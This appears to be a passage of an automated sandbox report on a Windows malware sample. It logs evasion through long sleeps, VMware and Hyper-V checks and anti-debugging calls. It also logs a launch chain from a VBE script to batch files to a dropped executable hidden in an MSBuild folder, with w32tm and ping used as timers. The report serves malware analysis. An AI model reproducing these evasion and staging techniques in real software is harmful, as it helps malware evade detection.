                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23434
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7996Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 5348Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 6092Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2004Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7108Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7488Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7516Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 3052Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2196Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7752Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 708Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 7960Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 8164Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 1076Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 2792Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_002DA69B
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_002EC220
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EE6A3 VirtualQuery,GetSystemInfo,0_2_002EE6A3
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2551375996.000000001B353000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2088916085.000000001BCB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                                    Source: w32tm.exe, 00000008.00000002.1744031152.000001501C579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWnI
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2278947690.000000001B782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\9
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2343920548.000000001B889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2343920548.000000001B889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oL
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2088916085.000000001BC3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                                    Source: w32tm.exe, 00000038.00000002.2446018019.000001CA018C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1952324247.000000001B6AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Yw;}
                                    Source: 7vP2IvNXqx.exe, fXvSafnhbinoSxnWSYFNsCJETLnb.exe3.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe0.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe2.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe1.4.dr, winIntorefruntimebroker.exe.0.drBinary or memory string: HGfS1OICL5
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
                                    Source: w32tm.exe, 00000008.00000002.1744031152.000001501C58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                                    Source: w32tm.exe, 0000001F.00000002.2058987582.00000193A0227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}iJ:
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1758738890.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.1927332382.0000027D39628000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001A.00000002.1993561726.00000260655F0000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2020272407.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000029.00000002.2238626867.0000023A704C0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002E.00000002.2304902815.0000014A90A60000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2319292050.0000000001118000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000033.00000002.2372257253.000001DD99897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeAPI call chain: ExitProcess graph end nodegraph_0-23663
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002EF838
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F7DEE mov eax, dword ptr fs:[00000030h]0_2_002F7DEE
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002FC030 GetProcessHeap,0_2_002FC030
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002EF838
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF9D5 SetUnhandledExceptionFilter,0_2_002EF9D5
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002EFBCA
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F8EBD
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
